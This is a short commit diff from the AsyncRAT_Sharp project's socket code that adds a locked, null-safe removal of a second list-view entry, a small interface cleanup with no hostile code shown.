Check LV2

This commit is contained in:
NYAN CAT 2019-06-02 09:52:33 +03:00
parent 1dd3e2e9f3
commit 492c47cf59

View File

@ -125,6 +125,8 @@ namespace AsyncRAT_Sharp.Sockets
{
lock (Settings.Listview1Lock)
LV.Remove();
lock (Settings.Listview3Lock)
LV2?.Remove();
}
catch { }
}));